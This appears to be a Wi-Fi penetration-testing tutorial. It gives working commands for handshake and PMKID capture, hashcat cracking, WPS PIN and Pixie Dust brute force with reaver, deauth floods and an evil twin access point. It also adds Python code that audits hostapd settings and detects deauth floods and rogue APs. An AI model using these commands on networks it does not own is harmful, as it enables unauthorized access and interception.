Enable monitor mode on the wireless adapter

Use the following command to put the adapter into monitor mode:

# airmon-ng <start|stop|check> <interface>
sudo airmon-ng start <interface>

[screenshot]
On success, the output shows that the adapter has entered monitor mode.

Scan nearby Wi-Fi networks

Use the following command to discover nearby Wi-Fi networks:

sudo airodump-ng <interface>

[screenshot]

Capture the handshake

Choose an access point with a strong signal (a high PWR value) so that a weak signal does not prevent the handshake from being captured.

# airodump-ng -c <channel> --bssid <bssid> -w <pcap prefix> <interface>
sudo airodump-ng -c 6 --bssid 9E:7F:81:48:6B:0E -w hidden wlx00224369f3a1

[screenshot]

No client connected

Here no client is connected. WPA/WPA2 cannot be attacked with fake authentication: the command does run and appears to forge an association, but the result is meaningless.

[screenshots]

There is another important difference between cracking WPA/WPA2 and WEP. This is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is because the key is not static, so collecting IVs, as when cracking WEP encryption, does not speed up the attack. The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network. Although not absolutely true, for the purposes of this tutorial, consider it true. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key.

The following figure illustrates the difficulty of cracking WPA well:

[screenshot]

References:
https://www.aircrack-ng.org/doku.php?id=cracking_wpa
https://sharkfest.wireshark.org/retrospective/sfus/presentations12/MB-6_Introduction_to_WiFi_Security_and_Aircrack-ng.pdf

When no client is connected, the following approaches can be tried:

PMKID attack

PMKSA = PMKID + Lifetime of PMK + MAC addresses + other variables
PMKID = HMAC-SHA1-128(PMK, "PMK Name" + MAC(AP) + MAC(Supplicant))

Steps

Capture the PMKID with hcxdumptool. Install it:

sudo apt install hcxtools

Capture (with the adapter in promiscuous/monitor mode):

sudo hcxdumptool -i <interface> -o <dump file> --enable_status=<digit>
# enable real-time display (waterfall) only incoming traffic
# each message is displayed only once at the first occurrence to avoid spamming the real-time display
#                                     bitmask:
#                                         0: no status (default)
#                                         1: EAPOL
#                                         2: ASSOCIATION and REASSOCIATION
#                                         4: AUTHENTICATION
#                                         8: BEACON and PROBERESPONSE
#                                        16: ROGUE AP
#                                        32: GPS (once a minute)
#                                        64: internal status (once a minute)
#                                        ...
#                                     example: show everything but don't run as server or client (1+2+4+8+16 = 31)
#                                              show only EAPOL and ASSOCIATION and REASSOCIATION (1+2 = 3)

To capture the PMKID of a single target AP, use the filter options:

sudo hcxdumptool -i <interface> -o <dump file> --enable_status=1 --filterlist_ap=target --filtermode=2

Convert the capture into a hash format that hashcat recognizes:

# hcxpcapngtool (the successor of hcxpcaptool) writes hashcat's hc22000 format
hcxpcapngtool -o hash.hc22000 <file>

Crack it with hashcat:

# -m 22000 matches the hc22000 file above; the older -m 16800 mode expects the
# separate PMKID-only format written by hcxpcaptool -z, so the two must not be mixed
hashcat -m 22000 --force hash.hc22000 <dict>
# afterwards, display the cracked entries from the potfile
hashcat -m 22000 hash.hc22000 --show

Reference: https://www.hackingarticles.in/wireless-penetration-testing-pmkid-attack/

PIN brute force

Some routers enable the WPS PIN by default; brute-forcing the 8-digit PIN is enough to obtain the Wi-Fi password. The PIN consists of three parts: digits 1-4, digits 5-7 and digit 8. The first four digits and the middle three are independent of each other, and the last digit is a checksum, so in theory at most 11000 attempts are needed. However, routers now have anti-PIN-brute-force protection, which locks the PIN function after a few attempts.

Install the software:

sudo apt install reaver

Brute force with reaver

Use the following command to check whether WPS is enabled and whether it is locked:

sudo wash -i <interface>

[screenshot]

Use the following command to brute-force the PIN:

# -b (single dash) is reaver's BSSID option
sudo reaver -i <interface> -c <channel> -b <bssid> -vv

[screenshot]

Routers without WPS protection can be PIN brute-forced, and the progress is displayed. With protection, the progress bar stalls and advances only once in a long while (this indicates protection; in that case give up on the WPS approach).
  • The current specification of the Wi-Fi Protected Setup specification (version 2.0.8) has specific recommendations for implementers of the protocol to protect against brute force attacks of the PIN.

[screenshot]

Offline PIN brute force

In addition, for wireless chipsets affected by the Pixie Dust vulnerability, appending -K 1 to the command computes the PIN offline. Affected scope:

The affected chipset vendors are mainly some Broadcom models, Realtek, Ralink (owned by MediaTek), MediaTek, Celeno and others.

  • Note: Realtek fixed this vulnerability in 2016.

The result is shown below (this attempt failed):

[screenshot]

Dictionary attack

Exhaustive brute force with a password dictionary, the last resort.
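From the defender's side, every method in this "no client connected" part (PMKID capture, WPS PIN brute force, Pixie Dust, dictionary attack) comes down to a handful of access-point settings. The following added example, which is not part of the original post or of hostapd, audits a hostapd.conf fragment for those settings: WPS enabled (wps_state, ap_pin), a passphrase short enough to be a dictionary target, TKIP/WPA1 still accepted, and management-frame protection (ieee80211w), which matters for the deauth attack covered further down. The two configuration fragments are constructed for the example, and the 20-character minimum passphrase length is an assumption (the post only states the allowed range of 8 to 63 characters).

```python
# Constructed hostapd.conf fragments for the example (not from a real deployment).
WEAK_CONF = """
interface=wlan0
ssid=CorpWiFi
hw_mode=g
channel=6
wpa=3
wpa_passphrase=password1
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=TKIP CCMP
ieee80211w=0
eap_server=1
wps_state=2
ap_pin=12345670
"""

HARDENED_CONF = """
interface=wlan0
ssid=CorpWiFi
hw_mode=g
channel=6
wpa=2
wpa_passphrase=correct-horse-battery-staple-2024
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
ieee80211w=2
wps_state=0
"""

# Assumption: the post only says a PSK may be 8-63 characters; 20 is our own minimum.
MIN_PASSPHRASE_LEN = 20


def parse_hostapd_conf(text):
    """Parse key=value lines, skipping blanks and '#' comments."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def audit_hostapd_conf(text):
    """Return a list of (option, finding) pairs for settings the attacks above rely on."""
    conf = parse_hostapd_conf(text)
    findings = []

    # wps_state: 0 = disabled, 1/2 = enabled (unconfigured/configured)
    if conf.get("wps_state", "0") != "0":
        findings.append(("wps_state",
                         "WPS enabled: the 8-digit PIN can be brute-forced online "
                         "(at most 11000 attempts) or recovered offline on Pixie Dust "
                         "affected chipsets; set wps_state=0"))
    if "ap_pin" in conf:
        findings.append(("ap_pin", "a static WPS PIN is configured; remove it"))

    # wpa is a bitmask: bit 1 = WPA1, bit 2 = WPA2 (RSN)
    if int(conf.get("wpa", "0")) & 1:
        findings.append(("wpa", "WPA1 is still accepted; set wpa=2"))
    ciphers = (conf.get("wpa_pairwise", "") + " " + conf.get("rsn_pairwise", "")).split()
    if "TKIP" in ciphers:
        findings.append(("rsn_pairwise", "TKIP is allowed; use CCMP only"))

    # ieee80211w: 0 = PMF off, 1 = optional, 2 = required. Without PMF, deauth
    # frames are unauthenticated and a forged one forces a fresh handshake.
    if conf.get("ieee80211w", "0") != "2":
        findings.append(("ieee80211w",
                         "management frames unprotected: deauth frames can be "
                         "spoofed; set ieee80211w=2"))

    # A captured handshake or PMKID is only as strong as the passphrase behind it.
    passphrase = conf.get("wpa_passphrase", "")
    if passphrase and len(passphrase) < MIN_PASSPHRASE_LEN:
        findings.append(("wpa_passphrase",
                         f"passphrase is {len(passphrase)} characters; handshake and "
                         f"PMKID captures are cracked offline against a dictionary, "
                         f"use at least {MIN_PASSPHRASE_LEN}"))
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"== {name}: {len(audit_hostapd_conf(conf))} finding(s)")
        for option, finding in audit_hostapd_conf(conf):
            print(f"  {option}: {finding}")
```

The parser deliberately ignores hostapd's multi-BSS sections and includes; for a production check, run it over each bss= block separately.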

Client connected

Deauth attack

If a client is connected, deauth frames can be sent (forcing the client offline so that it reconnects to the network) in order to capture the handshake.

[screenshot]

Use the following command to send deauth frames:

sudo aireplay-ng --deauth <count> -a <bssid> -c <client mac> <interface>

[screenshot]

When the following indicator appears, the handshake has been captured:

[screenshot]
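A burst of deauth frames like the one aireplay-ng sends is easy to spot from a monitor-mode capture: one source address emitting many deauthentication or disassociation frames within a few seconds. The following added detection example is not part of the original post or of the aircrack-ng suite. It runs a sliding-window counter over a constructed list of already-parsed management frames (timestamp, subtype, source, destination; the MAC addresses are made up, locally administered ones) and raises one alert per source that crosses the threshold; the 8-frames-in-5-seconds threshold is an assumption to tune per site.

```python
from collections import defaultdict, deque

# Constructed addresses for the example (locally administered, not real devices).
AP = "02:00:00:00:00:a1"
CLIENT = "02:00:00:00:00:c1"
OTHER_AP = "02:00:00:00:00:b1"


def _burst(start, n, src, dst):
    """n deauth frames, 100 ms apart, starting at `start` seconds."""
    return [(round(start + 0.1 * i, 1), "deauth", src, dst) for i in range(n)]


# Constructed sample: (timestamp_s, subtype, source_mac, destination_mac).
SAMPLE_FRAMES = (
    [
        (0.0, "beacon", AP, "ff:ff:ff:ff:ff:ff"),
        (0.5, "deauth", AP, CLIENT),            # single legitimate deauth (idle timeout)
        (3.0, "assoc_req", CLIENT, AP),
        (7.0, "deauth", OTHER_AP, "02:00:00:00:00:c2"),
    ]
    + _burst(10.0, 12, AP, CLIENT)              # flood spoofing the AP: 12 frames in 1.1 s
    + [(11.5, "assoc_req", CLIENT, AP)]         # victim reconnects: handshake exposed
)


def detect_deauth_floods(frames, window_s=5.0, threshold=8):
    """Alert once per source that sends >= threshold deauth/disassoc frames
    within any window_s-second window. Returns a list of alert dicts."""
    recent = defaultdict(deque)   # source -> deque of (timestamp, destination)
    alerted = set()
    alerts = []
    for ts, subtype, src, dst in sorted(frames, key=lambda f: f[0]):
        if subtype not in ("deauth", "disassoc"):
            continue
        q = recent[src]
        q.append((ts, dst))
        # drop frames that fell out of the window
        while q and ts - q[0][0] > window_s:
            q.popleft()
        if len(q) >= threshold and src not in alerted:
            alerted.add(src)
            alerts.append({
                "source": src,
                "count": len(q),
                "targets": sorted({d for _, d in q}),
                "first_seen": q[0][0],
                "triggered_at": ts,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_deauth_floods(SAMPLE_FRAMES):
        print(f"deauth flood from {alert['source']} towards {alert['targets']}: "
              f"{alert['count']} frames between {alert['first_seen']}s and "
              f"{alert['triggered_at']}s")
```

Because the attacker spoofs the AP's address, the alert names the legitimate BSSID as the source; the real signal is the rate, not the address. An AP with management-frame protection (802.11w, ieee80211w=2 in hostapd) discards forged deauth frames, so on such a network the clients would not drop and the burst itself is the only trace.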

evil twin attack

Use the following command to configure the SSID and start the twin access point:

sudo airbase-ng -e <ssid> -c <channel> <interface>

Then enable IP forwarding, traffic proxying, MITM, phishing and so on.

Reference: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59

KRACK man-in-the-middle attack

Create an access point with the same SSID and the same BSSID on a different channel, then broadcast a channel-switch announcement so that clients move over, achieving a man-in-the-middle position. Vulnerable targets: Linux and Android 6.0 or later. Script: https://github.com/vanhoefm/krackattacks-scripts
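Both the evil twin above (same SSID, attacker-controlled BSSID) and the KRACK channel clone (same SSID and same BSSID on a different channel) show up in a scan list as entries that do not match the known inventory of the network's own access points. The following added example, which is not from the original post or from the krackattacks-scripts project, compares a constructed airodump-style scan list (SSID, BSSID, channel, security) against a constructed inventory and reports the two cases; the SSIDs, addresses and channels are made up for the example.

```python
# Constructed inventory of our own access points: (ssid, bssid) -> expected channel.
KNOWN_APS = {
    ("CorpWiFi", "02:00:00:00:00:a1"): 6,
    ("CorpWiFi", "02:00:00:00:00:a2"): 11,
}

# Constructed scan result rows: (ssid, bssid, channel, security).
SAMPLE_SCAN = [
    ("CorpWiFi", "02:00:00:00:00:a1", 6, "WPA2"),    # ours, as expected
    ("CorpWiFi", "02:00:00:00:00:a2", 11, "WPA2"),   # ours, as expected
    ("CorpWiFi", "02:00:00:00:00:e1", 6, "OPN"),     # our SSID on an unknown BSSID, open
    ("CorpWiFi", "02:00:00:00:00:A1", 1, "WPA2"),    # our BSSID cloned on channel 1
    ("GuestNet", "02:00:00:00:00:b1", 1, "WPA2"),    # not our SSID at all: ignored
]


def audit_scan(scan, known):
    """Compare scan rows against the inventory and return a list of finding dicts."""
    inventory = {(ssid, bssid.lower()): ch for (ssid, bssid), ch in known.items()}
    our_ssids = {ssid for ssid, _ in inventory}
    findings = []
    for ssid, bssid, channel, security in scan:
        bssid = bssid.lower()              # normalise before comparing
        if ssid not in our_ssids:
            continue                       # other networks are out of scope
        expected = inventory.get((ssid, bssid))
        if expected is None:
            # evil twin pattern: our SSID announced by an AP we do not own
            findings.append({"kind": "evil_twin_candidate", "ssid": ssid,
                             "bssid": bssid, "channel": channel,
                             "security": security})
        elif channel != expected:
            # KRACK pattern: our own BSSID seen on a channel we do not use
            findings.append({"kind": "bssid_clone_on_other_channel", "ssid": ssid,
                             "bssid": bssid, "channel": channel,
                             "expected_channel": expected, "security": security})
    return findings


if __name__ == "__main__":
    for f in audit_scan(SAMPLE_SCAN, KNOWN_APS):
        print(f)
```

A legitimate channel change by your own AP also trips the second rule, so keep the inventory in step with controller changes; the open-network evil twin, on the other hand, is unambiguous whenever the real SSID is WPA2.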

Social engineering

  1. Knock on the door and ask directly
  2. Wi-Fi phishing
  3. ...